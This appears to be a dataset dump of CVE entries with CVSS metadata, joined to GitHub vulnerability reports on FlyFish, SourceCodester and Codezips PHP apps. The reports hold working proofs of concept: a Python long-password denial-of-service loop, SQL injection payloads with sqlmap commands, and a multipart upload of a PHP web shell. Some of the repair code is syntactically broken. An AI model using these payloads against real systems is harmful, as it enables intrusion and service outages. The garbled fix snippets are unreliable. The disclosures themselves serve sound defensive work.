Taking the login function as an example, it does not review some basic information and directly encrypts the transmitted password with MD5 encryption and compares it with database entries, but does not impose a maximum length limit on the password. Regardless of whether the incoming password is in plaintext or ciphertext form, attackers can construct packets and fill them with excessively long passwords. In the program's view, this long string is a password related field, forcing the system to perform the password hash process of long passwords, causing the server CPU and memory to run out, resulting in a denial of service attack on the server. This may cause the website to crash for a long time, meaning it is unusable or unresponsive.
**4. POC**
4.1 Environmental construction
We use Docker to build the program. First, download the docker-compose.yml file from the Gitee community, and then execute the sudo docker-compose up -d command to build the environment.
4.2 Code logic
We use Python language to simulate random long passwords by generating random long strings. Then, we sequentially send short and long passwords to the server to prove that the program's response time is normal. Long passwords are used to verify the existence of denial of service attacks in the program. While sending long passwords, we also log in to the correct account in the browser to verify that this attack did indeed cause server downtime. Please refer to the video for the browser login test. The video first shows the normal login time, and then simulates a denial of service attack. As the long password is transmitted, the server's CUP and memory gradually run out, and the user login time gradually increases until it crashes. In Attack_video, we simulated the login time extension caused by a longer password. And, we continued to increase the password length and demonstrated the scenario of the program not responding.
4.3 POC code
The headers field in the code is the field obtained from the HTTP request packet during normal login using Wireshark packet capture.
```
import requests
url = "http://127.0.0.1:8089/#/flyfish/login"
headers = {"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64;rv:125.0) Gecko/20100101 Firefox/125.0","Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type":"applicationjson/json","Origin": "http://127.0.0.1:8089","Connection": "keep-alive", "Referer":"http://127.0.0.1:8089/"}
for i in [100,10000,20000,30000,40000,45000,80000]:
passwd = "1574598741" * i * 1000
data = {"name": "admin", "pass": f"{passwd}",}
r = requests.post(url , headers=headers, data=data,timeout=999)
print(f"密码长度:{i} 万")
print("响应时间:",r.elapsed.total_seconds())
print("-"*20)
```
4.4 POC results
It can be seen that as the password length increases, the time for the server to process response requests also increases. Therefore, it can be seen that as long as the password is long enough, the server will also go down for a long time. The testing situation can be seen in the video. In Attack_video, we simulated the extension of login time caused by a longer password, and continued to increase the password length and demonstrated the scenario of the program not responding.

**5. Repair plan**
One possible fix is to limit the length of input data within the frontend input box, while another possible fix is to add a maximum password length limit in BaseUserController or in login functions, registration functions, and other functions that involve password operations. In short, as long as the maximum length of the password is limited, this problem can be solved.


| Flyfish has a DDoS vulnerability | https://api.github.com/repos/CloudWise-OpenSource/FlyFish/issues/191/comments | 0 | 2024-05-04T06:26:39Z | 2024-05-04T06:26:39Z | https://github.com/CloudWise-OpenSource/FlyFish/issues/191 | 2,278,785,038 | 191 | 6,026 |
CVE-2024-5046 | 2024-05-17T13:15:59.540 | A vulnerability was found in SourceCodester Online Examination System 1.0. It has been rated as critical. This issue affects some unknown processing of the file registeracc.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264743. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/32"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264743"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264743"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.335527"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/32"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264743"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264743"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.335527"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:warrendaloyan:online_examination_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1AD6E663-A1BA-4328-BEBF-73C8D20DEA66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CveSecLook/cve/issues/32 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Online Examination System Project 1.0 registeracc.php SQL injection vulnerability
# NAME OF AFFECTED PRODUCT(S)
+ Online Examination System Project
## Vendor Homepage
+ https://www.sourcecodester.com/php/14351/online-examination-system-project.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ zebra11
## Vulnerable File
+ registeracc.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/razormist/online-polling-system.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ The method on line 22 of the "registeracc.php" file retrieves the value of the user input "email" from the POST element. Then the value of this element will be passed to the code without proper purification or validation, and ultimately used for database queries in the method on line 27 of the "registeracc.php" file. This may lead to SQL injection attacks.
+ 
## Impact
+ Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.
# DESCRIPTION
+ zebra11 discovered a significant security vulnerability in the Online Examination System Project, caused by inadequate protection of the "email" parameter in the "registeracc.php" file. This vulnerability could be exploited to inject malicious SQL queries, leading to unauthorized access and the extraction of sensitive information from the database.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Payload
+ firstname=11&lastname=11&email=123@qq.com' AND (SELECT 2698 FROM (SELECT(SLEEP(5)))jmKW) AND 'pNgQ'='pNgQ&password=123456&ConfirmPassword=123456&submit=Register Account
```
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: firstname=11&lastname=11&email=123@qq.com' RLIKE (SELECT (CASE WHEN (5510=5510) THEN 0x3132334071712e636f6d ELSE 0x28 END)) AND 'uaZm'='uaZm&password=123456&ConfirmPassword=123456&submit=Register Account
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: firstname=11&lastname=11&email=123@qq.com' AND (SELECT 2698 FROM (SELECT(SLEEP(5)))jmKW) AND 'pNgQ'='pNgQ&password=123456&ConfirmPassword=123456&submit=Register Account
```
+ This is showing the payload implemented by running sqlmap
+ 
+ List all databases of the server using the constructed payload command using sqlmap
```bash
python sqlmap.py -u "192.168.31.216:8115/registeracc.php" --data="firstname=11&lastname=11&email=123@qq.com&password=123456&ConfirmPassword=123456&submit=Register Account" -p email --dbms=mysql --risk=3 --level=5 --batch --dbs
```
+ 
+ List all table names under the specified database 'poll'
```bash
python sqlmap.py -u "192.168.31.216:8115/registeracc.php" --data="firstname=11&lastname=11&email=123@qq.com&password=123456&ConfirmPassword=123456&submit=Register Account" -p email --dbms=mysql --risk=3 --level=5 --batch -D poll --tables
```
+ 
| SourceCodester Online Examination System Project 1.0 registeracc.php SQL injection vulnerability | https://api.github.com/repos/CveSecLook/cve/issues/32/comments | 0 | 2024-05-15T16:50:17Z | 2024-05-15T16:50:17Z | https://github.com/CveSecLook/cve/issues/32 | 2,298,393,646 | 32 | 6,027 |
CVE-2024-5049 | 2024-05-17T14:15:22.407 | A vulnerability, which was classified as critical, has been found in Codezips E-Commerce Site 1.0. Affected by this issue is some unknown functionality of the file admin/editproduct.php. The manipulation of the argument profilepic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-264746 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/polaris0x1/CVE/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264746"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264746"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.335838"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/polaris0x1/CVE/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264746"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264746"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.335838"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:codezips:e-commerce_site:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "448FA2B8-9265-4027-B054-7BCE8AD7278A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/polaris0x1/CVE/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"polaris0x1",
"CVE"
] | # Codezips E-commerce Site Using PHP With Source Code 1.0 admin/editproduct.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ E-commerce Site Using PHP With Source Code
## Vendor Homepage
+ https://codezips.com/php/e-commerce-site-using-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ polaris0x1
## Vulnerable File
+ admin/editproduct.php
## VERSION(S)
+ V1.0
## Software Link
+ https://codeload.github.com/codezips/ecommerce-site-using-php/zip/master
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ The input obtained from line 67 of the "/admin/editproduct.php" file is used in line 86 of the "/admin/editproduct.php" file to determine the location of the file to be written, which may allow attackers to change or damage the content of the file, or create a brand new file.
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE.
# DESCRIPTION
+ polaris0x1 found that the file upload operation was triggered in admin/editproduct.php, and the _FAILES variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE.
# Vulnerability details and POC
## Payload
+ The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly.
+ 
```
POST /admin/editproduct.php?epid=57 HTTP/1.1
Host: 192.168.31.180:8201
Content-Length: 2200
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.31.180:8201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoMwmpThrkX3kjCeo
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.31.180:8201/admin/editproduct.php?epid=57
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
admin_login=borsha%40gmail.com
Connection: close
------WebKitFormBoundaryoMwmpThrkX3kjCeo
Content-Disposition: form-data; name="profilepic"; filename="rce.php"
Content-Type: image/jpeg
<?php system("ipconfig"); ?>
------WebKitFormBoundaryoMwmpThrkX3kjCeo
Content-Disposition: form-data; name="updatepic"
Change Picture
------WebKitFormBoundaryoMwmpThrkX3kjCeo--
```
## Burp screenshot
+ 
## Uploading file name changes, it is speculated that it is a timestamp renaming mechanism
+ 
+ 
## I successfully executed the PHP script on the terminal
+  | Codezips E-commerce Site Using PHP With Source Code 1.0 admin/editproduct.php Unrestricted Upload | https://api.github.com/repos/ppp-src/CVE/issues/2/comments | 0 | 2024-05-16T03:14:10Z | 2024-05-16T03:14:10Z | https://github.com/ppp-src/CVE/issues/2 | 2,299,242,580 | 2 | 6,028 |
CVE-2024-5116 | 2024-05-20T04:15:09.070 | A vulnerability, which was classified as critical, has been found in SourceCodester Online Examination System 1.0. Affected by this issue is some unknown functionality of the file save.php. The manipulation of the argument vote leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265196. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/polaris0x1/CVE/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.265196"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.265196"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.338578"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/polaris0x1/CVE/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.265196"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.265196"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.338578"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:warrendaloyan:online_examination_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1AD6E663-A1BA-4328-BEBF-73C8D20DEA66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/polaris0x1/CVE/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"polaris0x1",
"CVE"
] | # SourceCodester Online Polling System 1.0 save.php SQL injection vulnerability
# NAME OF AFFECTED PRODUCT(S)
+ Online Examination System Project
## Vendor Homepage
+ https://www.sourcecodester.com/php/14351/online-examination-system-project.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ polaris0x1
## Vulnerable File
+ save.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/razormist/online-polling-system.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ There is a typical SQL injection vulnerability in the save.php file of the project "Online Polling System". This vulnerability stems from the application's failure to properly clean and validate user input, directly using input data for database queries. In this code snippet, the variable $vote is the user input directly obtained through $REGUEST ['vote']. Due to the lack of any form of checking or escaping the content of $vote, malicious users can modify the structure of SQL queries by constructing special input values, thereby executing illegal SQL operations
+ 
## Vulnerability code snippets
```PHP
<?php
require('connection.php');
$vote = $_REQUEST['vote'];
mysqli_query($conn, "UPDATE tbCandidates SET candidate_cvotes=candidate_cvotes+1 WHERE candidate_name='$vote'");
mysqli_close($conn);
?>
```
+ In the above code snippet, the variable $vote is the user input directly obtained through $REGUEST ['vote ']. Due to the lack of any form of checking or escaping the content of $vote, malicious users can modify the structure of SQL queries by constructing special input values, thereby performing illegal SQL operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the "Online Polling System" project, polaris0x1 discovered a significant vulnerability in the save.php file. The vote parameter lacks proper sanitization and validation, allowing attackers to inject malicious SQL queries and gain unauthorized database access. This can result in the modification of voting data and potential exposure of sensitive information. Immediate measures are needed to address this flaw and ensure data security and fairness in the voting process.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ Time based blind SQL injection
## Vulnerability location:
+ 'vote' parameter
## Payload:
```bash
vote=test 'AND (SELECT 5530 From (SELECT (SLEEP (5))) wnWB) -- AWBQ
```
+ This Payload indicates that if the injected SQL command is true, the database will execute the 'SLEEP (5)' function, causing the query to pause for 5 seconds. This delay is crucial for detecting database response, as it determines whether injected SQL statements are executed by observing response time.
## Database Information:
+ DBMS: MySQL>=5.0.12
+ Web server operating system: Windows
+ Web application technology: PHP 5.5.38, Apache 2.4.23
```
Parameter: vote (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: vote=test' AND (SELECT 5530 FROM (SELECT(SLEEP(5)))wnWB)-- AWBQ
```
+ This is showing the payload implemented by running sqlmap
+ 
+ List all databases of the server using the constructed payload command using sqlmap
```bash
python sqlmap.py -u "http://192.168.31.216:8115/save.php?vote=test" --batch --risk=3 --level=5 --dbs
```
+ 
+ List all table names under the specified database 'poll'
```bash
python sqlmap.py -u "192.168.31.216:8115/registeracc.php" --data="firstname=11&lastname=11&email=123@qq.com&password=123456&ConfirmPassword=123456&submit=Register Account" -p email --dbms=mysql --risk=3 --level=5 --batch -D poll --tables
```
+ 
# Suggested repair
## Regarding the SQL injection vulnerability discovered in the 'save. php' file in the 'Online Polling System' project, the following are several practical suggested fix measures:
### 1 Using parameterized queries (Prepared Statements)
+ One of the most effective ways to prevent SQL injection attacks is to use parameterized queries. This method ensures that the structure of SQL commands is not altered by incoming data. In PHP, PDO (PHP Data Objects) or MySQL extensions can be used to implement parameterized queries.
#### Example code (using PDO):
```PHP
$stmt=$pdo ->prepare ('UPDATE tbCandidates SET candidate votes=candidate votes+1 WHERE candidate name=: vote ');
$stmt ->execute (['vote '=>$vote]);
```
#### Example code (using MySQL):
```PHP
$stmt=$conn ->prepare ('UPDATE tbCandidates SET candidate votes=candidate votes+1 WHERE candidate name=? ');
$stmt ->bind_param ('s(), $vote);
$stmt ->execute();
```
### 2 Strengthen input validation
+ Strict validation is crucial before processing any user input. Determine whether the input data conforms to the expected format and type, for example, if the 'vote' parameter should be a known candidate name, ensure that the input value strictly matches the candidate list.
#### Example code:
```PHP
$allowed_votes=['Candidate1 ',' Candidate2 ',' Candidate3 ']// Candidate list
